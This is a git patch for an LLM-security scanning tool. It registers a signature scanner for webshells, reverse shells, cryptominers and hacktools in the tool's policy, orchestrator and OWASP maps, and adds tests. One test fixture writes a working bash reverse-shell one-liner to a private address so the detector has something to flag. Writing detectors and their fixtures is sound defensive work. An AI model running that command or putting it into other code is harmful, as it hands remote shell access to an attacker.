From e46bf12b864570b3e5eb557063013c7a21e3bb65 Mon Sep 17 00:00:00 2001 From: Kjell Tore Guttormsen Date: Sat, 20 Jun 2026 09:32:23 +0200 Subject: [PATCH] feat(llm-security): wire SIG scanner into orchestrator and policy Co-Authored-By: Claude Opus 4.8 (1M context) Claude-Session: https://claude.ai/code/session_01V3s6WnubSSrFjAQTLQdVbG --- scanners/lib/policy-loader.mjs | 6 +++ scanners/lib/severity.mjs | 4 ++ scanners/scan-orchestrator.mjs | 2 + tests/scanners/signature-scanner.test.mjs | 53 ++++++++++++++++++++++- 4 files changed, 64 insertions(+), 1 deletion(-) diff --git a/scanners/lib/policy-loader.mjs b/scanners/lib/policy-loader.mjs index fc7ef08..3690bd5 100644 --- a/scanners/lib/policy-loader.mjs +++ b/scanners/lib/policy-loader.mjs @@ -83,6 +83,12 @@ const DEFAULT_POLICY = Object.freeze({ 'run', 'do', 'go', 'help', 'fix', 'use', 'get', 'set', 'all', 'any', 'it', 'this', 'that', ], }, + // SIG — known-bad-identity signature engine. Toggle families or point at a + // custom ruleset via policy.json. + sig: { + enabled_families: ['webshell', 'reverse_shell', 'cryptominer', 'hacktool'], + custom_rules_path: null, + }, }); // Cache loaded policy per project root diff --git a/scanners/lib/severity.mjs b/scanners/lib/severity.mjs index 8a21a6b..31b9eae 100644 --- a/scanners/lib/severity.mjs +++ b/scanners/lib/severity.mjs @@ -144,6 +144,7 @@ export const OWASP_MAP = Object.freeze({ PST: ['LLM01', 'LLM06'], WFL: ['LLM02', 'LLM06'], TRG: ['LLM06'], + SIG: ['LLM03', 'LLM02'], }); /** @@ -164,6 +165,7 @@ export const OWASP_AGENTIC_MAP = Object.freeze({ PST: ['ASI02', 'ASI03', 'ASI04', 'ASI05'], WFL: ['ASI04'], TRG: [], + SIG: ['ASI04'], }); /** @@ -184,6 +186,7 @@ export const OWASP_SKILLS_MAP = Object.freeze({ PST: ['AST01', 'AST03'], WFL: [], TRG: ['AST04'], + SIG: [], }); /** @@ -204,6 +207,7 @@ export const OWASP_MCP_MAP = Object.freeze({ PST: ['MCP02', 'MCP07'], WFL: [], TRG: [], + SIG: [], }); /** diff --git a/scanners/scan-orchestrator.mjs b/scanners/scan-orchestrator.mjs index af603b1..04d35ac 100644 --- a/scanners/scan-orchestrator.mjs +++ b/scanners/scan-orchestrator.mjs @@ -110,6 +110,7 @@ import { scan as supplyChainScan } from './supply-chain-recheck.mjs'; import { scan as workflowScan } from './workflow-scanner.mjs'; import { scan as tfaScan } from './toxic-flow-analyzer.mjs'; import { scan as trgScan } from './trigger-scanner.mjs'; +import { scan as sigScan } from './signature-scanner.mjs'; const SCANNERS = [ { name: 'unicode', fn: unicodeScan }, @@ -123,6 +124,7 @@ const SCANNERS = [ { name: 'supply-chain', fn: supplyChainScan }, { name: 'workflow', fn: workflowScan }, { name: 'trg', fn: trgScan }, + { name: 'sig', fn: sigScan }, { name: 'toxic-flow', fn: tfaScan, requiresPriorResults: true }, ]; diff --git a/tests/scanners/signature-scanner.test.mjs b/tests/scanners/signature-scanner.test.mjs index 1388744..7638fc5 100644 --- a/tests/scanners/signature-scanner.test.mjs +++ b/tests/scanners/signature-scanner.test.mjs @@ -8,7 +8,7 @@ import { describe, it, beforeEach } from 'node:test'; import assert from 'node:assert/strict'; import { resolve, join } from 'node:path'; import { fileURLToPath } from 'node:url'; -import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs'; +import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readFileSync } from 'node:fs'; import { tmpdir } from 'node:os'; import { resetCounter } from '../../scanners/lib/output.mjs'; import { discoverFiles } from '../../scanners/lib/file-discovery.mjs'; @@ -124,3 +124,54 @@ describe('signature-scanner: path exclusions', () => { } }); }); + +// --------------------------------------------------------------------------- +// Wiring — OWASP map + orchestrator registration (Step 4) +// --------------------------------------------------------------------------- + +describe('signature-scanner: OWASP map registration', () => { + it('SIG is present in all four OWASP maps with the right codes', async () => { + const { OWASP_MAP, OWASP_AGENTIC_MAP, OWASP_SKILLS_MAP, OWASP_MCP_MAP } = + await import('../../scanners/lib/severity.mjs'); + assert.deepEqual(OWASP_MAP.SIG, ['LLM03', 'LLM02']); + assert.deepEqual(OWASP_AGENTIC_MAP.SIG, ['ASI04']); + assert.deepEqual(OWASP_SKILLS_MAP.SIG, []); + assert.deepEqual(OWASP_MCP_MAP.SIG, []); + }); +}); + +describe('signature-scanner: orchestrator registration', () => { + it('scan-orchestrator imports and lists the SIG scanner', () => { + const orchPath = resolve(__dirname, '../../scanners/scan-orchestrator.mjs'); + const text = readFileSync(orchPath, 'utf8'); + assert.match(text, /import\s+\{\s*scan as sigScan\s*\}\s+from\s+['"]\.\/signature-scanner\.mjs['"]/); + assert.match(text, /\{\s*name:\s*'sig',\s*fn:\s*sigScan\s*\}/); + }); +}); + +// --------------------------------------------------------------------------- +// Policy — disabling a family suppresses only that family's findings (Step 4) +// --------------------------------------------------------------------------- + +describe('signature-scanner: family disable', () => { + it('disabling "webshell" suppresses webshell findings but keeps reverse_shell', async () => { + const dir = mkdtempSync(join(tmpdir(), 'sig-family-')); + try { + mkdirSync(join(dir, '.llm-security'), { recursive: true }); + writeFileSync( + join(dir, '.llm-security', 'policy.json'), + JSON.stringify({ sig: { enabled_families: ['reverse_shell'] } }), + ); + writeFileSync(join(dir, 'shell.php'), "\n"); + writeFileSync(join(dir, 'rev.sh'), '#!/bin/sh\nbash -i >& /dev/tcp/10.0.0.1/4444 0>&1\n'); + resetCounter(); + const discovery = await discoverFiles(dir); + const result = await scan(dir, discovery); + const families = result.findings.map(f => f.evidence); + assert.ok(!families.some(e => /\[webshell\]/.test(e)), `webshell family should be suppressed, got: ${families.join('; ')}`); + assert.ok(families.some(e => /\[reverse_shell\]/.test(e)), `reverse_shell should still fire, got: ${families.join('; ')}`); + } finally { + rmSync(dir, { recursive: true, force: true }); + } + }); +});